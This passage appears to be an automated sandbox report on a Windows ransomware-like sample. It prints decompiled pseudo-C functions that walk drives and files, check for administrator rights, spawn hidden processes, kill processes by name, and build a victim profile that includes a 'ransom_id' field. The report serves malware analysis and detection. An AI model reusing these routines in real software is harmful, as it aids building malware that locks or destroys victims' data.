Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
Instruction ID: a427c5faede150c50d802e976730206525a879d89cb9664245e235534ffcdea3
Opcode Fuzzy Hash: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
Instruction Fuzzy Hash: FF5136719083019FC310CF14C988B5BBBE5FF88315F504A2EFA89A73A1D375A944CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406840 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406840(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E004066F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x00406859
0x0040685f
0x0040686e
0x0040687c
0x00406890
0x00406898
0x004068a0
0x004068a8
0x004068b6
0x004068cb
0x004068db
0x004068e3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00406859
wsprintfW.USER32 ref: 0040686E
InitializeCriticalSection.KERNEL32(?), ref: 0040687C
VirtualAlloc.KERNEL32 ref: 004068B0

Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 004068DB
ExitThread.KERNEL32 ref: 004068E3

Strings

%c:\, xrefs: 00406868

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
Instruction ID: d88b45d10d8f236cef520cbec221070cd426d639c7b6d1ffd4d7ad39dfd3f75c
Opcode Fuzzy Hash: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
Instruction Fuzzy Hash: 800196B5244300BFE7109F50CD8EF577BA8AB84B14F004628FB65AD1E2D7B09904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403A60() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t5 =  &_v8; // 0x404a63
					_t16 =  *_t15(0, _v12, _t5);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					_t10 =  &_v8; // 0x404a63
					return  *_t10;
				} else {
					return _t13;
				}
			}

0x00403a69
0x00403a89
0x00403a90
0x00403a98
0x00403aaf
0x00403ab5
0x00403abe
0x00403ac5
0x00403ac7
0x00403aca
0x00403ad0
0x00403ad6
0x00403a9d
0x00403a9d
0x00403a9d

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00403AA3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00403AAF
FreeSid.ADVAPI32(?), ref: 00403ACA

Strings

cJ@, xrefs: 00403AB5, 00403AD0, 00403AB8
advapi32.dll, xrefs: 00403A9E
CheckTokenMembership, xrefs: 00403AA9

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll$cJ@
API String ID: 3309497720-3398485638
Opcode ID: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
Instruction ID: 33a1519f93ae69caf91dd4e42da6a452692d52d9b4e3223079b77a4f0d81269a
Opcode Fuzzy Hash: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
Instruction Fuzzy Hash: D2F03C30A40209BBEB109BE0DD0EFADBB7CEB04705F1045A5FA04B62D1E6745A108B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E00403030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E00403030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E00403030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E00407DB0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E00402830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x00402890
0x00402899
0x0040289b
0x004028b1
0x004028b6
0x004028f9
0x00402901
0x004028b8
0x004028c0
0x004028c3
0x004028ca
0x004028cf
0x004028d0
0x004028d8
0x004028e5
0x004028eb
0x004028f0
0x00402910
0x00402914
0x00402916
0x0040291d
0x0040291f
0x00402920
0x00402920
0x00402923
0x00402926
0x0040292b
0x0040292b
0x0040292e
0x0040293f
0x00402942
0x00402942
0x00402951
0x00402954
0x0040295e
0x004028f2
0x004028f3
0x00000000
0x004028f3
0x004028f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,00402C02), ref: 004028AB
GetFileSize.KERNEL32(00000000,00000000,?,?,00402C02), ref: 004028BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00402C02), ref: 004028E5
CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 004028F3
MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,00402C02), ref: 0040290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00402C02), ref: 00402942
CloseHandle.KERNEL32(?,?,?,00402C02), ref: 00402951
CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 00402954

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
Instruction ID: c7753fadabc3ce0f8503889d90d66a1a67b62c86d4c9c93fbc6d336bdc04640e
Opcode Fuzzy Hash: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
Instruction Fuzzy Hash: 8A2134B2B011197FE7106B749D8AF7F7B6CEB45225F00423AFC01B22C1E6789D0045A8

Uniqueness

Uniqueness Score: -1.00%

Function 004033E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004033E0(int* __ecx, void* __eflags, char _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t1 =  &_a4; // 0x405135
				_t26 =  *_t1;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E004032B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E00403320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E00403190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E00403200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t10 = _t26[1];
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

APIs

Part of subcall function 004032B0: lstrlenA.KERNEL32(?,00000000,?,5Q@,?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032C5
Part of subcall function 004032B0: lstrlenA.KERNEL32(?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032EE

lstrlenA.KERNEL32(5Q@,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403484
GetProcessHeap.KERNEL32(00000008,00000001,?,00405135,00000000), ref: 0040348E
HeapAlloc.KERNEL32(00000000,?,00405135,00000000), ref: 00403495
lstrcpyA.KERNEL32(00000000,5Q@,?,00405135,00000000), ref: 004034A7
ExitProcess.KERNEL32 ref: 004034DB

Strings

5Q@, xrefs: 004033E5, 0040343B, 00403483, 004034A5, 004034B7

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID: 5Q@
API String ID: 1867342102-144561132
Opcode ID: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
Instruction ID: a602f992c252cea2a24e073b1cce2c09e2fd92cb4485f691b182cac4319fe13f
Opcode Fuzzy Hash: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
Instruction Fuzzy Hash: BA31E3305042455AEB265F289C447B77FAC9B06312F1841BBE8C5BF3C2D67D4E4787A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402C50 Relevance: 10.6, APIs: 7, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0x40e290; // 0x21
				asm("movdqu xmm0, [0x40e280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E00402AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00402C8A
BeginPaint.USER32(?,?), ref: 00402C9F
lstrlenW.KERNEL32(?), ref: 00402CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00402CBD
EndPaint.USER32(?,?), ref: 00402CCB
CreateThread.KERNEL32 ref: 00402CE9
DestroyWindow.USER32(?), ref: 00402CF2

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID:
API String ID: 572880375-0
Opcode ID: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
Instruction ID: 316be470bdb16b495eaa6a8a4de42634492684a59cc3721c0e018fd81b09cf01
Opcode Fuzzy Hash: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
Instruction Fuzzy Hash: D5116332604209ABE711DF54EE0DFAA7B6CFB48311F000626FD45E91E1E7B19D24DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404B10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404B10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E00408B30( &_v92, 0, 0x44);
				_t15 =  *0x412b0c; // 0x55c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0x412b08; // 0x558
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x00404b1c
0x00404b22
0x00404b24
0x00404b29
0x00404b2e
0x00404b36
0x00404b39
0x00404b3c
0x00404b41
0x00404b48
0x00404b4d
0x00404b58
0x00404b77
0x00404b8d
0x00404b98
0x00404b79
0x00404b83
0x00404b83

APIs

_memset.LIBCMT ref: 00404B29
CreateProcessW.KERNEL32 ref: 00404B6F
GetLastError.KERNEL32(?,?,00000000), ref: 00404B79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B92

Strings

D, xrefs: 00404B58

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
Instruction ID: c9167ab5344422c8a44933cba82276f3a3bd4aa998c81f02b44ccbb638d81527
Opcode Fuzzy Hash: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
Instruction Fuzzy Hash: E3014471E40319ABDB10DFA4DC46BDE7BB8EF04714F104226FA08FA190E7B569548B98

Uniqueness

Uniqueness Score: -1.00%

Function 004047F8 Relevance: 10.5, APIs: 7, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x004047f8
0x004047f8
0x00404800
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x00404842
0x00000000
0x00000000
0x00404844
0x00404844
0x0040484a
0x00404850
0x00404850
0x00404855
0x004047f4
0x00404800
0x00000000
0x00000000
0x00000000
0x00404800
0x00404859
0x00404863
0x00404863
0x00404872
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x0040483f

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
CloseHandle.KERNEL32(00000000), ref: 00404831
Process32NextW.KERNEL32(?,00000000), ref: 0040484A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
CloseHandle.KERNEL32(?), ref: 0040486A

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
String ID:
API String ID: 999196985-0
Opcode ID: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
Instruction ID: 1a13c8a93cbec1d8c6bc579d8d4bacd9a5b995379d62742e90ee94b5f9f4cf80
Opcode Fuzzy Hash: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
Instruction Fuzzy Hash: 7E01D6B7200111ABEB102F10AD48B6B7368EBD5301F104435FF49B61A1EB759C05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004039B0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004039B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
				intOrPtr* _t44;

				_t44 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
				 *(__ecx + 4) = L"pc_user";
				 *(__ecx + 0x10) = L"pc_name";
				 *((intOrPtr*)(__ecx + 0x18)) = 1;
				 *(__ecx + 0x1c) = L"pc_group";
				 *(__ecx + 0x28) = L"av";
				 *(__ecx + 0x34) = L"pc_lang";
				 *(__ecx + 0x40) = L"pc_keyb";
				 *(__ecx + 0x4c) = L"os_major";
				 *(__ecx + 0x58) = L"os_bit";
				 *((intOrPtr*)(__ecx + 0x60)) = 1;
				 *(__ecx + 0x64) = L"ransom_id";
				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
				 *(__ecx + 0x88) = L"ip";
				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
				return _t44;
			}

APIs

GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Strings

d@, xrefs: 00403A0B
|@, xrefs: 004039FD
T@, xrefs: 00403A12
0@, xrefs: 00403A20
@@, xrefs: 00403A19
t@, xrefs: 00403A04

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID: 0@$@@$T@$d@$t@$|@
API String ID: 54951025-2847450446
Opcode ID: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
Instruction ID: 81848ed92efb6c47f2188ed1792c8f7cddf9ec8f0008dcc1071cc611d3409556
Opcode Fuzzy Hash: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
Instruction Fuzzy Hash: D5114EB4501B448FC7A0CF6AC58468ABFF0BB08718B409D2EE99A97B50D3B5B458CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406769 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406769() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E004063B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
										goto L8;
									}
								}
							}
						} else {
							E004066F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
